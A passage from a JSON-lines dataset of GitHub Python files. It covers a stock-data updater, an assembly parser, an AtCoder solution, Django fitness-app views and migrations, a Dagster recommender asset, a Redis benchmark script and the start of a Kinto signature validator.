newPal[page] = pd.DataFrame(np.zeros([len(allStkcdsGM), newDateNum]),index=allStkcdsGM,columns=betweenDays)\r\n lastPal = pd.DataFrame(savedPal['Pal'][:,-1,:],columns=savedStkcdsGM)\r\n barsDaily = md.get_dailybars(','.join(allStkcdsGM), nextTrdStr, availableDateStr)\r\n for bar in barsDaily:\r\n tdt = bar.strtime[:10]\r\n stk = '.'.join([bar.exchange,bar.sec_id])\r\n newPal['date'].loc[stk, tdt] = int(tdt.replace('-',''))\r\n newPal['open'].loc[stk, tdt] = bar.open\r\n newPal['high'].loc[stk, tdt] = bar.high\r\n newPal['low'].loc[stk, tdt] = bar.low\r\n newPal['close'].loc[stk, tdt] = bar.close\r\n newPal['volume'].loc[stk, tdt] = bar.volume\r\n newPal['amount'].loc[stk, tdt] = bar.amount\r\n newPal['pctchg'].loc[stk, tdt] = bar.close/bar.pre_close - 1\r\n # 计算自算复权因子 : 前一日收盘价*(1+当日收益率)/当日收盘价 s.t. (当日收盘价*当日复权因子)/前一日收盘价 = 1+ret\r\n # 若当日没有交易 : 沿用前一日 复权因子 循环外处理\r\n # 若前一日没有交易 前一日收盘价 特殊处理:\r\n # 当日有交易 : 取停牌前最后一个交易日的 收盘价\r\n # 当日没交易 没有退市 : 沿用前一日复权因子 循环外处理\r\n # 当日没交易 已经退市 : 沿用前一日复权因子 循环外处理\r\n # 若新股上市第一天 : 复权因子为1\r\n if stk in newStkcdsGm:\r\n newPal['adjfct'].loc[stk, tdt] = 1\r\n else:\r\n noTrdLast = (lastPal.loc[0, stk] == 0) if tdt == nextTrdStr else (newPal['date'].loc[stk, betweenDays[betweenDays.index(tdt) - 1]] == 0)\r\n if noTrdLast: # 前一日没交易 今日有交易(否则不应出现在bars里面)\r\n lastBar = md.get_last_n_dailybars(stk, 2, end_time=tdt)[-1]\r\n newPal['adjfct'].loc[stk, tdt] = lastPal.loc[15, stk] * lastBar.close * (1 + newPal['pctchg'].loc[stk, tdt]) / bar.close\r\n else:\r\n preClose = lastPal.loc[4,stk] if tdt==nextTrdStr else newPal['close'].loc[stk,betweenDays[betweenDays.index(tdt)-1]]\r\n newPal['adjfct'].loc[stk, tdt] = lastPal.loc[15, stk] * preClose * (1 + newPal['pctchg'].loc[stk, tdt]) / bar.close\r\n for dumi,tdt in enumerate(betweenDays):\r\n idx = newPal['adjfct'].loc[:,tdt]==0\r\n idx = idx.values\r\n if tdt==nextTrdStr:\r\n newPal['adjfct'].loc[idx[:savedStkNum], tdt] = lastPal.loc[15,:].values[idx[:savedStkNum]]\r\n else:\r\n newPal['adjfct'].loc[idx, tdt] = newPal['adjfct'].loc[idx, betweenDays[dumi-1]]\r\n newPal['adjprc'] = newPal['adjfct']*newPal['close']\r\n\r\n shareBar = md.get_share_index(','.join(allStkcdsGM), nextTrdStr, availableDateStr)\r\n for bar in shareBar:\r\n tdt = bar.pub_date\r\n stk = bar.symbol\r\n newPal['flow_a_share'].loc[stk, tdt] = bar.flow_a_share\r\n newPal['total_share'].loc[stk, tdt] = bar.total_share\r\n\r\n isST = np.array([int('ST' in sn) for sn in allSecNames.values])\r\n newPal['isst'] = pd.DataFrame(np.repeat(np.reshape(isST,(isST.shape[0],1)),len(betweenDays),axis=1), index=allStkcdsGM, columns=betweenDays)\r\n\r\n for page in newPal:\r\n newPal[page].to_csv(os.path.join(tempFilePath,'{}.csv'.format(page)),index=False,header=False )\r\n\r\n print('Pal temp files update finished with {0} stocks and {1} days in {2} seconds '.format(len(newStkcdsWind),len(betweenDays),time.time() - start))\r\n\r\nif __name__=='__main__':\r\n updatePal()\r\n","repo_name":"wqxl309/update_pal","sub_path":"updatePal.py","file_name":"updatePal.py","file_ext":"py","file_size_in_byte":8869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73782852648","text":"import asm\nimport re\n\ndef parse(f):\n \"\"\"Parse the contents of file f\"\"\"\n module = asm.Module(f)\n parse_asm(f, module)\n return module\n\ndef parse_asm(fname, module):\n \"\"\"Parse an assembly file and populate module\"\"\"\n with open(fname) as f:\n for line in f:\n # start of a new function\n m_fun = re.match(\"(?P[0-9_a-z]+):\", line, re.I)\n if m_fun:\n name = m_fun.group('fun')\n fun = asm.Function(name)\n module.functions.append(fun)\n next\n\n # instruction\n m_inst = re.match(\"\\s+(?P[a-z][a-z0-9.]+)\\s+\", line, re.I)\n if m_inst:\n fun.instructions.append(asm.Instruction(*lex_inst(line)))\n next\n\ndef lex_inst(inst):\n inst = inst.strip()\n ob = inst.find(\"[\")\n cb = inst.find(\"]\")\n if ob != -1 and cb != -1:\n inst = inst[:ob] + inst[ob:cb].replace(\",\", \"|\") + inst[cb:]\n\n (opcode, operands) = inst.split(maxsplit=1)\n operands = operands.split(\",\")\n opernads = [op.replace(\"|\", \",\") for op in operands]\n\n return (opcode, operands)\n\n","repo_name":"dmpots/asmdiff","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33997079429","text":"#!/usr/bin/env python3\n# https://atcoder.jp/contests/abc229/tasks/abc229_D?lang=ja\n\nimport bisect\nimport heapq\nimport math\nimport sys\nfrom collections import defaultdict, deque\nfrom itertools import (accumulate, groupby, permutations, combinations,\n combinations_with_replacement, product)\nfrom typing import *\ninput = sys.stdin.buffer.readline\n\n\nT = TypeVar('T')\nD = TypeVar('D')\n\n\ndef chmax(a: T, b: T) -> Tuple[T, bool]:\n if (a < b):\n a = b # aをbで更新\n return (a, True)\n return (a, False)\n\n\ndef chmin(a: T, b: T) -> Tuple[T, bool]:\n if (a > b):\n a = b # aをbで更新\n return (a, True)\n return (a, False)\n\n\ndef solve(S: str, K: int):\n n = len(S)\n a = [int(si == '.') for si in S]\n ans = 0\n r, sum_ = 0, 0\n for l in range(n):\n # 次のrが行けるか確認\n while ((r < n) and (sum_ + a[r] <= K)):\n # 行けたら実行\n sum_ += a[r]\n # 次のrへ\n r += 1\n # 行けないところまで来た\n ans, _ = chmax(ans, r-l) # [l, r)として結果を更新\n sum_ -= a[l] # 次のlに向けての処理\n print(ans)\n\n# def solve(S: str, K: int):\n# # cnt[r] - cnt[l] で s[l,r) の '.' の数を表す\n# cnt = [0]*(len(S)+1)\n# for i in range(len(S)):\n# if S[i] == '.':\n# cnt[i+1] = cnt[i] + 1\n# else:\n# cnt[i+1] = cnt[i]\n\n# r = 0\n# ans = 0\n# for l in range(len(S)):\n# while (r < len(S)) and (cnt[r+1] - cnt[l] <= K):\n# r += 1\n# # [l, r)に.がK超過したらr-lがlength\n# ans = max(r - l, ans)\n# print(ans)\n\n\ndef main():\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n S = next(tokens) # type: str\n K = int(next(tokens)) # type: int\n solve(S, K)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"come2ry/kyopro","sub_path":"Contests/abc229/D/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70777013287","text":"from django.conf import settings\nfrom django.contrib import messages\nfrom django.contrib.auth import login as auth_login\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.mail import send_mail\nfrom django.shortcuts import render, redirect\nfrom django.contrib.admin.views.decorators import staff_member_required\n\nfrom .forms import RegisterForm, UpdateUserForm, UpdateCustomerProfileForm, UpdateTrainerProfileForm, AddWorkoutForm, AddWorkoutProgramForm, FitnessDetailsForm, ContactForm\nfrom .models import Workout, WorkoutProgram, User\n\ndef index(request):\n return render(request, 'workouts/index.html')\n\ndef register(request):\n if request.method == 'POST':\n form = RegisterForm(request.POST)\n if form.is_valid():\n user = form.save()\n auth_login(request, user)\n return redirect('home')\n else:\n form = RegisterForm()\n return render(request, 'workouts/register.html', {'form': form})\n\n@login_required\ndef customer_profile(request):\n if request.method == 'POST':\n user_form = UpdateUserForm(request.POST, instance=request.user)\n customer_profile_form = UpdateCustomerProfileForm(request.POST, request.FILES, instance=request.user.customer_profile)\n\n if user_form.is_valid() and customer_profile_form.is_valid():\n user_form.save()\n customer_profile_form.save()\n messages.success(request, 'Your profile is updated successfully')\n return redirect(to='customer-profile')\n else:\n user_form = UpdateUserForm(instance=request.user)\n customer_profile_form = UpdateCustomerProfileForm(instance=request.user.customer_profile)\n\n return render(request, 'workouts/customer_profile.html', {'user_form': user_form, 'customer_profile_form': customer_profile_form})\n\ndef email_request(request):\n user = request.user\n workout_program = user.customer_profile.program.last()\n\n subject = 'Current Workout Program'\n message = f'Hi {user.first_name}, thank you for working with zoeziAI. Here is your current workout. \\n{workout_program.program}'\n email_from = settings.EMAIL_HOST_USER\n recipient_list = [user.email, ]\n send_mail( subject, message, email_from, recipient_list )\n messages.success(request, 'Email Sent!')\n return redirect(to='customer-profile')\n\n@login_required\n@staff_member_required\ndef trainer_profile(request):\n if request.method == 'POST':\n user_form = UpdateUserForm(request.POST, instance=request.user)\n trainer_profile_form = UpdateTrainerProfileForm(request.POST, request.FILES, instance=request.user.trainer_profile)\n\n if user_form.is_valid() and trainer_profile_form.is_valid():\n user_form.save()\n trainer_profile_form.save()\n messages.success(request, 'Your profile is updated successfully')\n return redirect(to='trainer-profile')\n else:\n user_form = UpdateUserForm(instance=request.user)\n trainer_profile_form = UpdateTrainerProfileForm(instance=request.user.trainer_profile)\n\n return render(request, 'workouts/trainer_profile.html', {'user_form': user_form, 'trainer_profile_form': trainer_profile_form})\n\ndef about_us(request):\n return render(request, 'workouts/about.html')\n\ndef categories(request):\n return render(request, 'workouts/categories.html')\n\ndef contact(request):\n if request.method == 'POST':\n form = ContactForm(request.POST)\n\n if form.is_valid():\n form.save()\n messages.success(request, 'Your message has been sent.')\n return redirect(to='contact')\n else:\n form = ContactForm()\n\n return render(request, 'workouts/contact.html', {'form': form})\n\n@login_required\ndef workouts(request):\n workouts = Workout.get_workouts()\n\n if request.method == 'POST':\n form = AddWorkoutForm(request.POST, request.FILES)\n if form.is_valid():\n workout = form.save(commit=False)\n workout.user = request.user\n workout.save()\n messages.success(request, 'Exercise added successfully')\n return redirect(to='workouts')\n else:\n form = AddWorkoutForm()\n\n return render(request, 'workouts/workouts.html', {'form': form, 'workouts': workouts})\n\n@login_required\ndef workout_programs(request):\n all_programs = WorkoutProgram.get_workout_programs()\n\n user_profile = request.user.customer_profile\n body_type = user_profile.body_type.lower()\n experience = user_profile.experience.lower()\n mode = user_profile.training_mode.lower()\n\n search_list = [experience, mode]\n selected_programs = WorkoutProgram.objects.filter(tags__name__in=search_list).distinct()\n\n if request.method == 'POST':\n form = AddWorkoutProgramForm(request.POST)\n\n if form.is_valid():\n form.save()\n return redirect(to='workout-programs')\n else:\n form = AddWorkoutProgramForm()\n\n return render(request, 'workouts/workout_programs.html', {'programs': all_programs, 'form': form, 'selected_programs': selected_programs})\n\n@login_required\ndef select_workout_program(request, program_id):\n request.user.customer_profile.program.add(program_id)\n\n return redirect(to='customer-profile')\n\n@login_required\ndef workout_program_details(request, program_id):\n program = WorkoutProgram.objects.get(id=program_id)\n return render(request, 'workouts/workout_program_details.html', {'program': program})\n\n@login_required\ndef fitness_details(request):\n if request.method == 'POST':\n form = FitnessDetailsForm(request.POST or None, instance=request.user.customer_profile)\n if form.is_valid():\n form.save()\n return redirect(to='workout-programs')\n else:\n form = FitnessDetailsForm(instance=request.user.customer_profile)\n\n return render(request, 'workouts/fitness_details.html', {'form': form})\n\n@login_required\ndef complete_workout(request, program_id):\n request.user.customer_profile.program.remove(program_id)\n\n return redirect(to='customer-profile')\n\n@login_required\n@staff_member_required\ndef reports(request):\n trainers = User.objects.filter(is_trainer=True)\n customers = User.objects.filter(is_customer=True)\n trainers_count = trainers.count()\n customer_count = customers.count()\n workouts_count = Workout.objects.all().count()\n programs_count = WorkoutProgram.objects.all().count()\n\n\n return render(request, 'workouts/reports.html', {\n 'trainers_count': trainers_count,\n 'customers_count': customer_count,\n 'workouts_count': workouts_count,\n 'programs_count': programs_count,\n 'trainers': trainers,\n 'customers': customers,\n })\n","repo_name":"GituMbugua/zoeziAI","sub_path":"workouts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75388832168","text":"import numpy.testing as npt\nimport numpy as np\nimport unittest\n\nimport sys, os\nsys.path.append(os.path.join(os.path.dirname(__file__), '..', 'graphs'))\nfrom complement_graph import ComplementGraph\n\nclass TestComplementGraph(unittest.TestCase):\n \n def setUp(self):\n self.n=4\n self.K_4_list=((0,1),(0,2),(0,3),(1,2),(1,3),(2,3),)\n self.K_4_complement_list=()\n\n def test_k4_iterator(self): \n iterator = ComplementGraph.iterator(self.n,self.K_4_list)\n self.assertEquals(tuple(iterator), self.K_4_complement_list)\n\n def test_empty_iterator(self): \n iterator = ComplementGraph.iterator(self.n,self.K_4_complement_list)\n self.assertEquals(tuple(iterator), self.K_4_list)\n\n# def test_k4_generator(self): \n # empty_list_generator = ComplementGraph.generator(self.n,self.K_4_list)\n # self.assertEquals(empty_list_generator, self.K_4_complement_list)\n\n #def test_empty_generator(self): \n # generator = ComplementGraph.generator(self.n,self.K_4_complement_list)\n #self.assertEquals(generator, self.K_4_list)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"jwgwalton/cvxgraph_public","sub_path":"cvxgraph/tests/test_complement_graph.py","file_name":"test_complement_graph.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35490389887","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('profile', '0009_auto_20151110_1423'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='DeviceUsage',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('device', models.CharField(max_length=255, choices=[(b'PC', b'PC'), (b'LT', b'Laptop'), (b'TB', b'Tablet'), (b'MF', b'Mobile phone'), (b'WE', b'Wearable')])),\n ('user', models.ForeignKey(related_name='devices', to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Influences',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('influence', models.CharField(max_length=255, choices=[(b'PC', b'PC'), (b'LT', b'Laptop'), (b'TB', b'Tablet'), (b'MF', b'Mobile phone'), (b'WE', b'Wearable')])),\n ('user', models.ForeignKey(related_name='influences', to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='PlatformUsage',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('platform', models.CharField(max_length=255, choices=[(b'MSWIN', b'MS Windows'), (b'OSX', b'OS X'), (b'LINUX', b'Linux'), (b'IOS', b'iOS'), (b'ANDR', b'Android')])),\n ('user', models.ForeignKey(related_name='platforms', to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.RemoveField(\n model_name='userprofile',\n name='devices',\n ),\n migrations.RemoveField(\n model_name='userprofile',\n name='influences',\n ),\n migrations.RemoveField(\n model_name='userprofile',\n name='platforms',\n ),\n ]\n","repo_name":"cloudteams/CustomerPlatform","sub_path":"profile/migrations/0010_auto_20151216_1248.py","file_name":"0010_auto_20151216_1248.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"74933293289","text":"\"\"\"type has been added to shtat_department_organizations\n\nRevision ID: c2a2a7a67afe\nRevises: dec0d7fef501\nCreate Date: 2022-09-13 14:40:13.435743\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = 'c2a2a7a67afe'\ndown_revision = 'dec0d7fef501'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n type_choice_enum = postgresql.ENUM('with_self', 'with_budget', name='typechoice', create_type=False)\n type_choice_enum.create(op.get_bind(), checkfirst=True)\n op.add_column('shtat_department_organizations', sa.Column('type', type_choice_enum, nullable=False))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('shtat_department_organizations', 'type')\n # ### end Alembic commands ###\n","repo_name":"bakhtiyorovdilshod/shtatka","sub_path":"migrations/versions/c2a2a7a67afe_type_has_been_added_to_shtat_department_.py","file_name":"c2a2a7a67afe_type_has_been_added_to_shtat_department_.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9881463417","text":"import numpy as np\nfrom dagster import asset\nfrom pandas import DataFrame\nfrom scipy.sparse import coo_matrix, csc_matrix, csr_matrix\nfrom sklearn.decomposition import TruncatedSVD\n\nfrom .user_story_matrix import IndexedCooMatrix\n\n\n@asset(io_manager_key=\"warehouse_io_manager\", key_prefix=[\"snowflake\", \"recommender\"])\ndef user_top_recommended_stories(\n context, recommender_model: TruncatedSVD, user_story_matrix: IndexedCooMatrix\n) -> DataFrame:\n \"\"\"The top stories for each commenter (user).\"\"\"\n # Compute XV, which has a row for each user and a column for each component\n XV = recommender_model.transform(user_story_matrix.matrix)\n\n # Now we want to project XV back into story-space. As a dense matrix, the product would be way\n # too big - | # users * # stories|, so we sparsify both the multiplicands to make it more\n # manageable.\n XV[np.abs(XV) < 1] = 0\n sparse_XV = csr_matrix(XV)\n context.log.info(f\"sparse_XV shape: {sparse_XV.shape}\")\n context.log.info(f\"sparse_XV non-zero: {sparse_XV.count_nonzero()}\")\n\n recommender_model.components_[np.abs(recommender_model.components_) < 1e-2] = 0\n sparse_components = csc_matrix(recommender_model.components_)\n context.log.info(f\"recommender_model.components_ shape: {recommender_model.components_.shape}\")\n context.log.info(f\"sparse_components non-zero: {sparse_components.count_nonzero()}\")\n\n # A matrix with the same dimensions as user_story_matrix, but reduced in rank\n X_hat = sparse_XV @ sparse_components\n\n coo = coo_matrix(X_hat)\n story_ids = user_story_matrix.col_index[coo.col].values\n user_ids = user_story_matrix.row_index[coo.row].values\n context.log.info(f\"recommendations: {len(story_ids)}\")\n\n return DataFrame.from_dict({\"user_id\": user_ids, \"story_id\": story_ids, \"relevance\": coo.data})\n","repo_name":"dagster-io/dagster","sub_path":"examples/project_fully_featured/project_fully_featured/assets/recommender/user_top_recommended_stories.py","file_name":"user_top_recommended_stories.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"16859439131","text":"n = int(input())\r\nresult = []\r\nfor _ in range(n):\r\n x, y = map(int, input().split())\r\n for i in range(10):\r\n for j in range(10):\r\n result.append((x+i, y+j))\r\n\r\nresult = list(set(result)) # 좌표 중복 제거\r\n \r\nprint(len(result)) # 좌표 하나당 넓이 1로 생각","repo_name":"MHK183/Practice_Algorithms","sub_path":"백준/Silver/2563. 색종이/색종이.py","file_name":"색종이.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21700524592","text":"import argparse\nimport datetime\nimport itertools\nimport math\nimport sys\nimport tornadis\nimport tornado\nfrom six import print_\nimport six\n\n\ndef get_parameters():\n parser = argparse.ArgumentParser(\n description='Tornadis benchmarking utility', add_help=False)\n parser.add_argument('--help', action='help')\n parser.add_argument('-h', '--hostname',\n help=\"Server hostname (default 127.0.0.1)\",\n default=\"127.0.0.1\")\n parser.add_argument('-p', '--port', help=\"Server port (default 6379)\",\n default=6379)\n parser.add_argument('-u', '--unix_domain_socket',\n help=\"path to a unix socket to connect to (if set \"\n \", overrides host/port parameters)\")\n parser.add_argument('-a', '--password', help=\"Password for Redis Auth\")\n parser.add_argument('-c', '--clients',\n help=\"Number of parallel connections (default 5)\",\n type=int, default=5)\n parser.add_argument('-n', '--requests',\n help=\"Total number of requests (default 100000)\",\n type=int, default=10000)\n parser.add_argument('-b', '--batch-size',\n help=\"Number of request to send in parallel\",\n type=int, default=None)\n parser.add_argument('-P', '--pipeline',\n help=\"Pipeline requests (honnor batch-size if set)\",\n action=\"store_true\")\n parser.add_argument('-d', '--data-size', default=2,\n help=\"Data size of SET/GET value in bytes (default 2)\",\n type=int)\n return parser.parse_args()\n\n\ndef group_iterable(iterable, total_size, group_size):\n processed_size = 0\n while True:\n if processed_size >= total_size:\n return\n else:\n chunk = itertools.islice(iterable, group_size)\n processed_size += group_size\n yield chunk\n\n\nclass Benchmark(object):\n\n def __init__(self, params):\n self.params = params\n self.request_count = self.params.requests\n self.requests_per_client = int(math.ceil(self.params.requests /\n float(self.params.clients)))\n self.response_count = 0\n self.value = '*' * self.params.data_size\n\n @tornado.gen.coroutine\n def multiple_set(self, client_number):\n uds = self.params.unix_domain_socket\n client = tornadis.Client(host=self.params.hostname,\n port=self.params.port,\n unix_domain_socket=uds,\n autoconnect=False,\n tcp_nodelay=True)\n print_(\"Connect client\", client_number)\n yield client.connect()\n print_(\"Client\", client_number, \"connected\")\n futures = (client.call(\"SET\", \"benchmark-key\", self.value)\n for _ in six.moves.range(self.requests_per_client))\n if self.params.batch_size:\n batches = group_iterable(futures, self.requests_per_client,\n self.params.batch_size)\n for batch in itertools.imap(list, batches):\n print_(\"Send {} requests with client {}\".format(len(batch),\n client_number))\n responses = yield batch\n resp_count = len(responses)\n print_(\"Received {} responses \"\n \"with client {}\".format(resp_count, client_number))\n self.response_count += resp_count\n else:\n print_(\"Send {} requests \"\n \"with client {}\".format(self.requests_per_client,\n client_number))\n responses = yield list(futures)\n resp_count = len(responses)\n print_(\"Received {} responses with client {}\".format(resp_count,\n client_number)\n )\n self.response_count += resp_count\n\n @tornado.gen.coroutine\n def _call_pipeline(self, client, pipeline, client_number):\n print_(\"Send {} pipelined requests \"\n \"with client {}\".format(pipeline.number_of_stacked_calls,\n client_number))\n responses = yield client.call(pipeline)\n resp_count = len(responses)\n print_(\"Received {} pipelined responses \"\n \"with client {}\".format(resp_count, client_number))\n raise tornado.gen.Return(resp_count)\n\n @tornado.gen.coroutine\n def pipelined_multiple_set(self, client_number):\n uds = self.params.unix_domain_socket\n client = tornadis.Client(host=self.params.hostname,\n port=self.params.port,\n unix_domain_socket=uds,\n autoconnect=False,\n tcp_nodelay=True)\n print_(\"Connect client\", client_number)\n yield client.connect()\n print_(\"Client\", client_number, \"connected\")\n pipeline_size = self.params.batch_size or self.requests_per_client\n print_(pipeline_size)\n pipeline = tornadis.Pipeline()\n for _ in six.moves.range(0, self.requests_per_client):\n pipeline.stack_call(\"SET\", \"benchmark-key\", self.value)\n if pipeline.number_of_stacked_calls >= pipeline_size:\n resp_count = yield self._call_pipeline(client, pipeline,\n client_number)\n self.response_count += resp_count\n pipeline = tornadis.Pipeline()\n if pipeline.number_of_stacked_calls > 0:\n resp_count = yield self._call_pipeline(client, pipeline,\n client_number)\n self.response_count += resp_count\n\n def stop_loop(self, future):\n excep = future.exception()\n if self.response_count == self.request_count:\n loop = tornado.ioloop.IOLoop.instance()\n loop.stop()\n if excep is not None:\n print_(excep)\n raise(excep)\n\n\ndef main():\n params = get_parameters()\n if params.requests % params.clients != 0:\n print_(\"Number of requests must be a multiple \"\n \"of number of clients\", file=sys.stderr)\n sys.exit(-1)\n\n loop = tornado.ioloop.IOLoop.instance()\n benchmark = Benchmark(params)\n print_(\"Max requests per client:\", benchmark.requests_per_client)\n before = datetime.datetime.now()\n for client_number in six.moves.range(params.clients):\n if params.pipeline:\n future = benchmark.pipelined_multiple_set(client_number)\n else:\n future = benchmark.multiple_set(client_number)\n loop.add_future(future, benchmark.stop_loop)\n loop.start()\n after = datetime.datetime.now()\n seconds = (after - before).total_seconds()\n print_(\"{} seconds\".format(seconds))\n print_(\"{} requests per second\".format(int(params.requests / seconds)))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"thefab/tornadis","sub_path":"tornadis/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":7248,"program_lang":"python","lang":"en","doc_type":"code","stars":126,"dataset":"github-code","pt":"53"} +{"seq_id":"71860523368","text":"#!/usr/bin/env python3\nimport os\nimport sys\n\nimport gflags\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom common import misc # noqa\nimport run_gossip_experiment # noqa\n\nFLAGS = gflags.FLAGS\n\n# Flags for update mode\ngflags.DEFINE_integer(\"target_update_load\", 500, \"Target update load in queries per second to issue.\")\ngflags.DEFINE_integer(\"update_rps_increment\", 20, \"Increment of requests per second per round for update calls.\")\ngflags.DEFINE_integer(\"update_initial_rps\", 100, \"Start rps and increment in update mode.\")\ngflags.DEFINE_integer(\"max_update_load\", 2000, \"Maximum update load in queries per second to issue.\")\n\n# Duration in seconds for which to execute workload in each round.\ngflags.DEFINE_integer(\"iter_duration\", 300, \"Duration per iteration of the benchmark.\")\n\n# Maximum failure rate and median query duration limit to consider\n# for rps to choose as rps_max. If failure rate or latency is higher,\n# continue running the benchmark, but do not consider this RPS\n# for max capacity\ngflags.DEFINE_float(\n \"allowable_failure_rate\", 0.2, \"Maximum failure rate at which to consider the iteration successful.\"\n)\ngflags.DEFINE_integer(\n \"update_allowable_t_median\",\n 30000,\n \"Maximum update median latency in unit of milliseconds at which to consider the iteration successful.\",\n)\n\n# Maximum failure rate and median query duration limit for when to\n# stop the benchmark.\ngflags.DEFINE_float(\"stop_failure_rate\", 0.4, \"Maximum failure rate before aborting the benchmark.\")\ngflags.DEFINE_integer(\n \"stop_t_median\", 60000, \"Maximum median latency in unit of milliseconds before aborting the benchmark.\"\n)\n\nif __name__ == \"__main__\":\n misc.parse_command_line_args()\n exp = run_gossip_experiment.GossipExperiment()\n exp.run_iterations()\n","repo_name":"simond110/ic","sub_path":"scalability/experiments/max_capacity_gossip.py","file_name":"max_capacity_gossip.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12162803998","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\n\nfor _ in range(int(input())):\n try:\n a,b = [int(x) for x in input().split()]\n print(int(a/b))\n except ZeroDivisionError as z:\n print(\"Error Code: integer division or modulo by zero\")\n except ValueError as v:\n print(\"Error Code:\", v)","repo_name":"hamzayn/My_HackerRank_Solutions","sub_path":"Exceptions.py","file_name":"Exceptions.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8093649172","text":"import base64\nimport concurrent.futures\nimport cryptography\nimport hashlib\nimport time\nfrom datetime import datetime\n\nimport cryptography.x509\nimport ecdsa\nimport requests\nfrom cryptography.hazmat.backends import default_backend as crypto_default_backend\nfrom cryptography.hazmat.primitives import serialization as crypto_serialization\nfrom cryptography.x509.oid import NameOID\nfrom kinto_signer.serializer import canonical_json\n\nfrom . import PARALLEL_REQUESTS, KintoClient as Client\n\n\nclass ValidationError(Exception):\n pass\n\n\ndef unpem(pem):\n # Join lines and strip -----BEGIN/END PUBLIC KEY----- header/footer\n return b\"\".join(\n [l.strip() for l in pem.split(b\"\\n\") if l and not l.startswith(b\"-----\")]\n )\n\n\ndef timestamp_to_date(timestamp_milliseconds):\n timestamp_seconds = int(timestamp_milliseconds) / 1000\n return datetime.utcfromtimestamp(timestamp_seconds).strftime(\n \"%Y-%m-%d %H:%M:%S UTC\"\n )\n\n\ndef download_collection_data(server_url, collection):\n client = Client(\n server_url=server_url,\n bucket=collection[\"bucket\"],\n collection=collection[\"collection\"],\n )\n endpoint = client.get_endpoint(\"collection\")\n # Collection metadata with cache busting\n metadata = client.get_collection(_expected=collection[\"last_modified\"])[\"data\"]\n # Download records with cache busting\n records = client.get_records(\n _sort=\"-last_modified\", _expected=collection[\"last_modified\"]\n )\n timestamp = client.get_records_timestamp()\n return (collection, endpoint, metadata, records, timestamp)\n\n\ndef validate_signature(event, context, **kwargs):\n \"\"\"Validate the signature of each collection.\n \"\"\"\n server_url = event[\"server\"]\n bucket = event.get(\"bucket\", \"monitor\")\n collection = event.get(\"collection\", \"changes\")\n client = Client(server_url=server_url, bucket=bucket, collection=collection)\n print(\"Read collection list from {}\".format(client.get_endpoint(\"collection\")))\n\n error_messages = []\n\n checked_certificates = {}\n\n collections = client.get_records()\n\n # Grab server data in parallel.\n start_time = time.time()\n collections_data = []\n with concurrent.futures.ThreadPoolExecutor(\n max_workers=PARALLEL_REQUESTS\n ) as executor:\n futures = [\n executor.submit(download_collection_data, server_url, c)\n for c in collections\n ]\n for future in concurrent.futures.as_completed(futures):\n collections_data.append(future.result())\n elapsed_time = time.time() - start_time\n print(f\"Downloaded all data in {elapsed_time:.2f}s\")\n\n for i, (collection, endpoint, metadata, records, timestamp) in enumerate(\n collections_data\n ):\n start_time = time.time()\n\n message = \"{:02d}/{:02d} {}: \".format(i + 1, len(collections), endpoint)\n\n # 1. Serialize\n serialized = canonical_json(records, timestamp)\n data = b\"Content-Signature:\\x00\" + serialized.encode(\"utf-8\")\n\n # 2. Grab the signature\n try:\n signature = metadata[\"signature\"]\n except KeyError:\n # Destination has no signature attribute.\n # Be smart and check if it was just configured.\n # See 